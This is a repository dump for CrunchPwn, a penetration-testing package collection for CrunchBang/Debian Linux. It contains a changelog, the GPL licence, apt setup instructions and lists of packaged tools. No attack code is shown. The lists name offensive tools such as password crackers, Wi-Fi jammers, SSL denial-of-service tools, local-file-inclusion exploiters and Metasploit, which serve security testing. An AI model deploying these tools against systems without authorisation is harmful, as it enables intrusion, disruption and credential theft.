├── CHANGELOG
├── LICENSE
├── README.md
├── docs
├── TODO
├── debian_packages
└── packages
├── packages
├── aircrack-ng
│ ├── aircrack-ng_1.2~beta2-1.debian.tar.gz
│ ├── aircrack-ng_1.2~beta2-1.dsc
│ └── aircrack-ng_1.2~beta2.orig.tar.gz
├── beleth
│ ├── beleth_0.1-1.debian.tar.gz
│ ├── beleth_0.1-1.dsc
│ └── beleth_0.1.orig.tar.gz
├── bluediving
│ ├── bluediving_0.9-1.debian.tar.gz
│ ├── bluediving_0.9-1.dsc
│ └── bluediving_0.9.orig.tar.gz
├── bluelog
│ ├── bluelog_1.1.2-1.debian.tar.gz
│ ├── bluelog_1.1.2-1.dsc
│ └── bluelog_1.1.2.orig.tar.gz
├── bully
│ ├── bully_1.0.22-1.debian.tar.gz
│ ├── bully_1.0.22-1.dsc
│ └── bully_1.0.22.orig.tar.gz
├── clusterd
│ ├── clusterd_0.1.1-1.debian.tar.gz
│ ├── clusterd_0.1.1-1.dsc
│ └── clusterd_0.1.1.orig.tar.gz
├── cp-backgrounds
│ ├── cp-backgrounds.build
│ ├── cp-boot.png
│ ├── cp-default.png
│ └── cp-login.png
├── cp-openbox-theme
│ ├── cp-openbox-theme.build
│ ├── nitrogen
│ │ └── bg-saved.cfg
│ ├── openbox-3
│ │ ├── bullet.xbm
│ │ ├── close.xbm
│ │ ├── iconify.xbm
│ │ ├── max.xbm
│ │ └── themerc
│ ├── openbox
│ │ ├── autostart
│ │ ├── menu.xml
│ │ └── rc.xml
│ └── tint2
│ │ └── tint2rc
├── cp-slim-theme
│ ├── background.png
│ ├── cp-slim-theme.build
│ ├── panel.png
│ ├── slim.conf
│ └── slim.theme
├── crunchpwn
│ ├── changelog
│ └── crunchpwn.build
├── dnsmap
│ ├── dnsmap_0.30-1.debian.tar.gz
│ ├── dnsmap_0.30-1.dsc
│ └── dnsmap_0.30.orig.tar.gz
├── dnsrecon
│ ├── dnsrecon_0.8.5-1.debian.tar.gz
│ ├── dnsrecon_0.8.5-1.dsc
│ └── dnsrecon_0.8.5.orig.tar.gz
├── dripper
│ ├── dripper_1.0-1.debian.tar.gz
│ ├── dripper_1.0-1.dsc
│ └── dripper_1.0.orig.tar.gz
├── ettercap
│ ├── ettercap_0.8.0-1.debian.tar.gz
│ ├── ettercap_0.8.0-1.dsc
│ └── ettercap_0.8.0.orig.tar.gz
├── exploit-db
│ ├── exploit-db_01.07.2014-1.debian.tar.gz
│ ├── exploit-db_01.07.2014-1.dsc
│ └── exploit-db_01.07.2014.orig.tar.gz
├── gscrape
│ ├── gscrape.build
│ ├── gscrape.pl
│ └── preinst
├── halcyon
│ ├── halcyon_0.1-1.debian.tar.gz
│ ├── halcyon_0.1-1.dsc
│ └── halcyon_0.1.orig.tar.gz
├── hydra
│ ├── hydra_7.6-1.debian.tar.gz
│ ├── hydra_7.6-1.dsc
│ └── hydra_7.6.orig.tar.gz
├── iaxflood
│ ├── iaxflood_0.1-1.debian.tar.gz
│ ├── iaxflood_0.1-1.dsc
│ └── iaxflood_0.1.orig.tar.gz
├── kismet
│ ├── kismet_2013.03.1.dsc
│ └── kismet_2013.03.1.tar.gz
├── kolkata
│ ├── LW2.pm
│ ├── kolkata
│ ├── kolkata.pl
│ └── sigs
│ │ ├── joomla.yml
│ │ ├── mediawiki.yml
│ │ └── wordpress.yml
├── lanspy
│ ├── lanspy_1.0-1.debian.tar.gz
│ ├── lanspy_1.0-1.dsc
│ └── lanspy_1.0.orig.tar.gz
├── lfiautopwn
│ ├── lfiautopwn
│ └── lfiautopwn.pl
├── linux-exploit-suggester
│ ├── LICENSE
│ ├── Linux_Exploit_Suggester.pl
│ ├── README.md
│ └── linux_exploit_suggester
├── masscan
│ ├── masscan_1.0-1.debian.tar.gz
│ ├── masscan_1.0-1.dsc
│ └── masscan_1.0.orig.tar.gz
├── medusa
│ ├── medusa_2.1.1-1.debian.tar.gz
│ ├── medusa_2.1.1-1.dsc
│ └── medusa_2.1.1.orig.tar.gz
├── metasploit
│ ├── metasploit.build
│ └── preinst
├── ncrack
│ ├── ncrack_0.4ALPHA-1.debian.tar.gz
│ ├── ncrack_0.4ALPHA-1.dsc
│ └── ncrack_0.4ALPHA.orig.tar.gz
├── pytinydns
│ ├── README
│ ├── pytinydns
│ ├── pytinydns.conf
│ ├── pytinydns.host
│ ├── pytinydns.py
│ └── redis_import.py
├── responder
│ ├── responder_0.1-1.debian.tar.gz
│ ├── responder_0.1-1.dsc
│ └── responder_0.1.orig.tar.gz
├── shellcodecs
│ ├── shellcodecs_0.1-1.debian.tar.gz
│ ├── shellcodecs_0.1-1.dsc
│ └── shellcodecs_0.1.orig.tar.gz
├── sqlmap
│ ├── sqlmap-0.9_3401-1.debian.tar.gz
│ ├── sqlmap-0.9_3401-1.dsc
│ ├── sqlmap-0.9_3401.orig.tar.gz
│ ├── sqlmap_0.9-1.debian.tar.gz
│ ├── sqlmap_0.9-1.dsc
│ └── sqlmap_0.9.orig.tar.gz
├── sslnuke
│ ├── sslnuke_1.0-1.debian.tar.gz
│ ├── sslnuke_1.0-1.dsc
│ └── sslnuke_1.0.orig.tar.gz
├── thc-ssl-dos
│ ├── thc-ssl-dos_1.4-1.debian.tar.gz
│ ├── thc-ssl-dos_1.4-1.dsc
│ └── thc-ssl-dos_1.4.orig.tar.gz
├── unicornscan
│ ├── unicornscan_0.4.7-1.debian.tar.gz
│ ├── unicornscan_0.4.7-1.dsc
│ └── unicornscan_0.4.7.orig.tar.gz
├── uniscan
│ ├── uniscan_6.2-1.debian.tar.gz
│ ├── uniscan_6.2-1.dsc
│ └── uniscan_6.2.orig.tar.gz
├── vanguard
│ ├── vanguard_0.1-1.debian.tar.gz
│ ├── vanguard_0.1-1.dsc
│ └── vanguard_0.1.orig.tar.gz
├── wifijammer
│ ├── README.md
│ ├── wifijammer.build
│ └── wifijammer.py
├── wolpertinger
│ ├── wolpertinger_0.6-1.debian.tar.gz
│ ├── wolpertinger_0.6-1.dsc
│ └── wolpertinger_0.6.orig.tar.gz
├── wpscan
│ ├── wpscan_2.2-1.debian.tar.gz
│ ├── wpscan_2.2-1.dsc
│ └── wpscan_2.2.orig.tar.gz
└── zarp
│ ├── zarp_0.1.5-1.debian.tar.gz
│ ├── zarp_0.1.5-1.dsc
│ └── zarp_0.1.5.orig.tar.gz
└── themes
├── openbox
├── README
├── crazymothafucka.obt
├── crazymothafucka
│ └── openbox-3
│ │ ├── bullet.xbm
│ │ ├── close.xbm
│ │ ├── iconify.xbm
│ │ ├── max.xbm
│ │ └── themerc
└── rc.xml
├── slim
├── background.png
└── crunchpwn
│ ├── background.png
│ ├── panel.png
│ └── slim.theme
├── syslinux
├── isolinux.cfg
└── splash.png
└── tint2
└── tint2rc
/CHANGELOG:
--------------------------------------------------------------------------------
1 | 3-Jan-14: Added initial commit and repository.
2 | Package ettercap added.
3 | Package hydra added.
4 |
5 | 4-Jan-14: Added Packages kismet/kismet-plugins-restricted
6 | Added beleth package
7 | Added i386 packages to repository
8 | Added working list of packages available through debian repos in docs/
9 | Added aircrack-ng
10 |
11 | 5-Jan-14: Added medusa package
12 | Added ncrack-0.4ALPHA
13 |
14 | 6-Jan-14: Added LANs.py
15 |
16 | 7-Jan-14: Added sslnuke
17 | Added dripper
18 | Added exploit-db package
19 |
20 | 8-Jan-14: Added thc-ssl-dos
21 | Added unicornscan
22 | Added bluediving
23 | Started crunchpwn install package
24 | Added debian repositories
25 | Fixed bluediving package
26 |
27 | 9-Jan-14: Added dnsmap
28 | Added sqlmap
29 | Added wpscan
30 | Added bluelog
31 | Added bully
32 | Added iaxflood
33 | Added dnsrecon
34 | Test slim login theme
35 |
36 | 10-Jan-14 Added masscan
37 | Added burpsuite
38 | Pulled in nikto from non-free to satisfy debian builds
39 |
40 | 11-Jan-14 Added more debian packages (pidgin/otr, privoxy, valgrind, valkyrie and proxychains)
41 | More debian packages (vbindiff, sleuthkit, autopsy, clamav, and vinetto)
42 | Added lfiautopwn
43 | Added pytinydns
44 | Added social engineer toolkit (SET)
45 | More debian packages (creepy, cryptcat, dns2tcp, dnswalk, lynis, scanssh, sslscan)
46 | More debian packages (fwknop-server, iodine, ipwatchd, pads, proxytunnel, ptunnel, ratproxy, redsocks, scanmem, udptunnel)
47 | More debian packages (tcpslice, tcptraceroute, tor-dbg, onioncat)
48 |
49 | 12-Jan-14 Updated readme
50 | Added Linux_Exploit_Suggester package
51 | Added kolkata package
52 | Added metasploit package
53 |
54 | 13-Jan-14 Added halcyon package
55 | Added vanguard package
56 |
57 | 14-Jan-14 Added gscrape package
58 | Added shellcodecs. Installs to /usr/share/shellcodecs
59 | Cleaned up i386 packages.
60 | Nightly build pushed to repository. crunchpwn_0.1-1_all.deb
61 | Crunchpwn also added under packages/ on github
62 |
63 | 15-Jan-14 Added maltego-tungsten-community to repository
64 | Updated gscrape package -- fixed preinst script.
65 | Nightly build pushed to repository. crunchpwn_0.1-2_all.deb
66 | Built preliminary alpha Live CD.
67 |
68 | 16-Jan-14 Added extra theme files and background
69 |
70 | 19-Jan-14 Added cp-slim-theme package to repository for default login screen
71 | Added crunchpwn_0.1-3_all.deb nightly build
72 | Added i2p, i2prouter, and libjbigi-jni packages from i2p repositories
73 |
74 | 20-Jan-14 Fixed modified source files
75 | Pushed updated pytinydns package
76 | Pushed updated exploit-db archive
77 |
78 | 21-Jan-14 Added cp-backgrounds package with default wallpapers
79 | Swapped the login background with new artwork. -- updated cp-slim-theme
80 |
81 | 22-Jan-14 Added cp-openbox-theme with updated menu
82 | Pushed nightly build 0.1-4 of crunchpwn.
83 |
84 | 25-Jan-14 Added wolpertinger distributed port scanner package
85 |
86 | 26-Jan-14 Added wolpertinger to i386 repo
87 | Pushed nightly build 0.1-5 of crunchpwn.
88 |
89 | 28-Jan-14 Updated exploit-db package
90 |
91 | 29-Jan-14 Updated cp-openbox-theme package
92 | Updated cp-slim-theme package
93 |
94 | 31-Jan-14 Added wifijammer package
95 | Pushed nightly build 0.1-6 of crunchpwn.
96 |
97 | 9-Feb-14 Added debian packages for full alpha release:
98 | libyaml-libyaml-perl, missidentify, readpst, reglookup, extundelete
99 | foremost, safecopy, tcpxtract, driftnet, samdump2, and pyrit
100 | Update crunchpwn package to match the live Alpha cd
101 | Updated cp-openbox-theme to include the updated menu.
102 |
103 | 10-Feb-14
104 | Added zarp_0.1.5-1 package to repo
105 | Added clusterd package to repo
106 | Added responder package to repo
107 |
108 | 11-Feb-14
109 | Added uniscan_6.2 package to repo
110 |
111 | 15-Feb-14
112 | Updated cp-openbox-theme with new menu
113 | Pushed nightly build
114 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
6 | Everyone is permitted to copy and distribute verbatim copies
7 | of this license document, but changing it is not allowed.
8 |
9 | Preamble
10 |
11 | The licenses for most software are designed to take away your
12 | freedom to share and change it. By contrast, the GNU General Public
13 | License is intended to guarantee your freedom to share and change free
14 | software--to make sure the software is free for all its users. This
15 | General Public License applies to most of the Free Software
16 | Foundation's software and to any other program whose authors commit to
17 | using it. (Some other Free Software Foundation software is covered by
18 | the GNU Lesser General Public License instead.) You can apply it to
19 | your programs, too.
20 |
21 | When we speak of free software, we are referring to freedom, not
22 | price. Our General Public Licenses are designed to make sure that you
23 | have the freedom to distribute copies of free software (and charge for
24 | this service if you wish), that you receive source code or can get it
25 | if you want it, that you can change the software or use pieces of it
26 | in new free programs; and that you know you can do these things.
27 |
28 | To protect your rights, we need to make restrictions that forbid
29 | anyone to deny you these rights or to ask you to surrender the rights.
30 | These restrictions translate to certain responsibilities for you if you
31 | distribute copies of the software, or if you modify it.
32 |
33 | For example, if you distribute copies of such a program, whether
34 | gratis or for a fee, you must give the recipients all the rights that
35 | you have. You must make sure that they, too, receive or can get the
36 | source code. And you must show them these terms so they know their
37 | rights.
38 |
39 | We protect your rights with two steps: (1) copyright the software, and
40 | (2) offer you this license which gives you legal permission to copy,
41 | distribute and/or modify the software.
42 |
43 | Also, for each author's protection and ours, we want to make certain
44 | that everyone understands that there is no warranty for this free
45 | software. If the software is modified by someone else and passed on, we
46 | want its recipients to know that what they have is not the original, so
47 | that any problems introduced by others will not reflect on the original
48 | authors' reputations.
49 |
50 | Finally, any free program is threatened constantly by software
51 | patents. We wish to avoid the danger that redistributors of a free
52 | program will individually obtain patent licenses, in effect making the
53 | program proprietary. To prevent this, we have made it clear that any
54 | patent must be licensed for everyone's free use or not licensed at all.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | GNU GENERAL PUBLIC LICENSE
60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
61 |
62 | 0. This License applies to any program or other work which contains
63 | a notice placed by the copyright holder saying it may be distributed
64 | under the terms of this General Public License. The "Program", below,
65 | refers to any such program or work, and a "work based on the Program"
66 | means either the Program or any derivative work under copyright law:
67 | that is to say, a work containing the Program or a portion of it,
68 | either verbatim or with modifications and/or translated into another
69 | language. (Hereinafter, translation is included without limitation in
70 | the term "modification".) Each licensee is addressed as "you".
71 |
72 | Activities other than copying, distribution and modification are not
73 | covered by this License; they are outside its scope. The act of
74 | running the Program is not restricted, and the output from the Program
75 | is covered only if its contents constitute a work based on the
76 | Program (independent of having been made by running the Program).
77 | Whether that is true depends on what the Program does.
78 |
79 | 1. You may copy and distribute verbatim copies of the Program's
80 | source code as you receive it, in any medium, provided that you
81 | conspicuously and appropriately publish on each copy an appropriate
82 | copyright notice and disclaimer of warranty; keep intact all the
83 | notices that refer to this License and to the absence of any warranty;
84 | and give any other recipients of the Program a copy of this License
85 | along with the Program.
86 |
87 | You may charge a fee for the physical act of transferring a copy, and
88 | you may at your option offer warranty protection in exchange for a fee.
89 |
90 | 2. You may modify your copy or copies of the Program or any portion
91 | of it, thus forming a work based on the Program, and copy and
92 | distribute such modifications or work under the terms of Section 1
93 | above, provided that you also meet all of these conditions:
94 |
95 | a) You must cause the modified files to carry prominent notices
96 | stating that you changed the files and the date of any change.
97 |
98 | b) You must cause any work that you distribute or publish, that in
99 | whole or in part contains or is derived from the Program or any
100 | part thereof, to be licensed as a whole at no charge to all third
101 | parties under the terms of this License.
102 |
103 | c) If the modified program normally reads commands interactively
104 | when run, you must cause it, when started running for such
105 | interactive use in the most ordinary way, to print or display an
106 | announcement including an appropriate copyright notice and a
107 | notice that there is no warranty (or else, saying that you provide
108 | a warranty) and that users may redistribute the program under
109 | these conditions, and telling the user how to view a copy of this
110 | License. (Exception: if the Program itself is interactive but
111 | does not normally print such an announcement, your work based on
112 | the Program is not required to print an announcement.)
113 |
114 | These requirements apply to the modified work as a whole. If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works. But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 |
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 |
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 |
134 | 3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 |
138 | a) Accompany it with the complete corresponding machine-readable
139 | source code, which must be distributed under the terms of Sections
140 | 1 and 2 above on a medium customarily used for software interchange; or,
141 |
142 | b) Accompany it with a written offer, valid for at least three
143 | years, to give any third party, for a charge no more than your
144 | cost of physically performing source distribution, a complete
145 | machine-readable copy of the corresponding source code, to be
146 | distributed under the terms of Sections 1 and 2 above on a medium
147 | customarily used for software interchange; or,
148 |
149 | c) Accompany it with the information you received as to the offer
150 | to distribute corresponding source code. (This alternative is
151 | allowed only for noncommercial distribution and only if you
152 | received the program in object code or executable form with such
153 | an offer, in accord with Subsection b above.)
154 |
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it. For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable. However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 |
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 |
172 | 4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License. Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 |
180 | 5. You are not required to accept this License, since you have not
181 | signed it. However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works. These actions are
183 | prohibited by law if you do not accept this License. Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 |
189 | 6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions. You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 |
197 | 7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License. If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all. For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 |
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 |
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices. Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 |
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 |
229 | 8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded. In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 |
237 | 9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time. Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 |
242 | Each version is given a distinguishing version number. If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation. If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 |
250 | 10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission. For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this. Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 |
258 | NO WARRANTY
259 |
260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | {description}
294 | Copyright (C) {year} {fullname}
295 |
296 | This program is free software; you can redistribute it and/or modify
297 | it under the terms of the GNU General Public License as published by
298 | the Free Software Foundation; either version 2 of the License, or
299 | (at your option) any later version.
300 |
301 | This program is distributed in the hope that it will be useful,
302 | but WITHOUT ANY WARRANTY; without even the implied warranty of
303 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
304 | GNU General Public License for more details.
305 |
306 | You should have received a copy of the GNU General Public License along
307 | with this program; if not, write to the Free Software Foundation, Inc.,
308 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
309 |
310 | Also add information on how to contact you by electronic and paper mail.
311 |
312 | If the program is interactive, make it output a short notice like this
313 | when it starts in an interactive mode:
314 |
315 | Gnomovision version 69, Copyright (C) year name of author
316 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
317 | This is free software, and you are welcome to redistribute it
318 | under certain conditions; type `show c' for details.
319 |
320 | The hypothetical commands `show w' and `show c' should show the appropriate
321 | parts of the General Public License. Of course, the commands you use may
322 | be called something other than `show w' and `show c'; they could even be
323 | mouse-clicks or menu items--whatever suits your program.
324 |
325 | You should also get your employer (if you work as a programmer) or your
326 | school, if any, to sign a "copyright disclaimer" for the program, if
327 | necessary. Here is a sample; alter the names:
328 |
329 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
330 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
331 |
332 | {signature of Ty Coon}, 1 April 1989
333 | Ty Coon, President of Vice
334 |
335 | This General Public License does not permit incorporating your program into
336 | proprietary programs. If your program is a subroutine library, you may
337 | consider it more useful to permit linking proprietary applications with the
338 | library. If this is what you want to do, use the GNU Lesser General
339 | Public License instead of this License.
340 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | CrunchPwn
2 | =========
3 |
4 | ---
5 | \#Pwn Linux (pronounced CrunchPwn) is a penetration testing repository/addition for CrunchBang Linux. The packages also work with any Debian Wheezy compliant system. Default themes are built specifically for OpenBox, but feel free to submit themes for various windows managers. Pull requests are gladly accepted, and requests for tools can be made by opening an issue on github.
6 |
7 | Setup
8 | =====
9 | Add Key
10 | -------
11 | curl http://repo.crunchpwn.org/gnupg.key | sudo apt-key add -
12 |
13 | /etc/apt/sources.list:
14 | ---------------------
15 | $ echo '## Crunchpwn
16 | deb http://repo.crunchpwn.org/ purson main' >> /etc/apt/sources.list
17 |
18 | Update Sources
19 | --------------
20 | sudo apt-get update
21 |
22 | Installation
23 | ------------
24 | sudo apt-get install crunchpwn
25 |
26 | Screenshots
27 | -----------
28 |
29 | 
30 |
31 | 
32 |
33 | 
34 |
--------------------------------------------------------------------------------
/docs/TODO:
--------------------------------------------------------------------------------
1 | Live Alpha Release:
2 | * i2p/tor DNS fu script
3 | * Host on linuxtracker.org
4 | * Full distro page on distrowatch.com
5 |
6 | Install Alpha Release:
7 | * Prompt users for config overwrite in /home/$user
8 | * Add themes for other window managers?
9 |
--------------------------------------------------------------------------------
/docs/debian_packages:
--------------------------------------------------------------------------------
1 | These packages already have standard debian packages
2 |
3 | apparmor
4 | apparmor-profiles
5 | arpalert
6 | arping
7 | arpon
8 | autopsy
9 | bokken
10 | chkrootkit
11 | clamav
12 | creepy
13 | cryptcat
14 | darkstat
15 | denyhosts
16 | dns2tcp
17 | dnswalk
18 | dsniff
19 | etherape
20 | extundelete
21 | fcrackzip
22 | foremost
23 | fping
24 | fwknop-server
25 | gdb
26 | gradm2
27 | hexedit
28 | hping3
29 | ike-scan
30 | iodine
31 | ipsec-tools
32 | ipwatchd
33 | irssi
34 | john
35 | john-data
36 | libyaml-libyaml-perl
37 | linux-patch-grsecurity2
38 | lsof
39 | lynis
40 | macchanger
41 | medusa
42 | missidentify
43 | mtr
44 | nast
45 | netsed
46 | netsniff-ng
47 | ngrep
48 | nikto
49 | nmap
50 | nmapsi4
51 | ntop
52 | onioncat
53 | openvpn
54 | ophcrack
55 | ophcrack-cli
56 | p0f
57 | packeth
58 | pads
59 | paxctl
60 | pdfcrack
61 | pidgin
62 | pidgin-otr
63 | prads
64 | privoxy
65 | proxychains
66 | proxytunnel
67 | ptunnel
68 | pyew
69 | pyrit
70 | python-scapy
71 | radare2
72 | ratproxy
73 | readpst
74 | reaver
75 | redsocks
76 | reglookup
77 | rkhunter
78 | safecopy
79 | samdump2
80 | scanmem
81 | scanssh
82 | screen
83 | sipcrack
84 | sleuthkit
85 | sniffit
86 | socat
87 | sslscan
88 | sslsniff
89 | sucrack
90 | tcpdump
91 | tcpick
92 | tcpreplay
93 | tcpslice
94 | tcpspy
95 | tcptraceroute
96 | tcptrack
97 | tcpxtract
98 | tmux
99 | tor
100 | torchat
101 | tor-dbg
102 | tshark
103 | udptunnel
104 | unhide
105 | valgrind
106 | valkyrie
107 | vbindiff
108 | vinetto
109 | vnstat
110 | w3af
111 | wapiti
112 | weplab
113 | wireshark
114 | xprobe
115 | xul-ext-firecookie
116 | zzuf
117 |
--------------------------------------------------------------------------------
/docs/packages:
--------------------------------------------------------------------------------
1 | aircrack-ng_1.2~beta2-1
2 | beleth_0.1-1
3 | bluediving_0.9
4 | bluelog_1.1.2
5 | bully_1.0.22
6 | burpsuite_1.5
7 | clusterd_0.1.1-1
8 | cp-backgrounds_0.1-1
9 | cp-openbox-theme_0.1-1
10 | cp-slim-theme_0.1
11 | crunchpwn_0.1-6 (Nightly build)
12 | dnsmap_0.30
13 | dnsrecon_0.8.5
14 | dripper_1.0-1
15 | ettercap_0.8.0-1 (ncurses and gtk)
16 | exploit-db_01.28.2014
17 | gscrape_0.1
18 | halcyon_0.1
19 | hydra_7.6-1 (ncurses and gtk)
20 | i2p_0.9.9-1
21 | i2p-server_0.9.9-1
22 | iaxflood_0.1
23 | kismet_2013.03.1
24 | kismet-plugins-restricted_2013.03.1
25 | kolkata_0.1
26 | lans.py
27 | libjbigi-jni_0.9.9-1
28 | linux_exploit_suggester_0.1
29 | lfiautopwn_0.1
30 | maltego-tungsten-community
31 | masscan_1.0
32 | medusa_2.1.1
33 | metasploit_latest
34 | ncrack_0.4ALPHA
35 | nikto_2.1.4
36 | pytinydns_0.1-2
37 | responder_0.1-1
38 | shellcodecs_0.1
39 | sqlmap_0.9
40 | set_0.1
41 | sslnuke_1.0
42 | thc-ssl-dos_1.4
43 | unicornscan_0.4.7
44 | uniscan_6.2
45 | vanguard_0.1
46 | wifijammer_0.1
47 | wolpertinger_0.6
48 | wpscan_0.9
49 | zarp_0.1.5
50 |
--------------------------------------------------------------------------------
/packages/aircrack-ng/aircrack-ng_1.2~beta2-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/aircrack-ng/aircrack-ng_1.2~beta2-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/aircrack-ng/aircrack-ng_1.2~beta2-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: aircrack-ng
3 | Binary: aircrack-ng
4 | Architecture: any
5 | Version: 1.2~beta2-1
6 | Maintainer: stderr
7 | Homepage: http://www.aircrack-ng.org
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | aircrack-ng deb admin extra
12 | Checksums-Sha1:
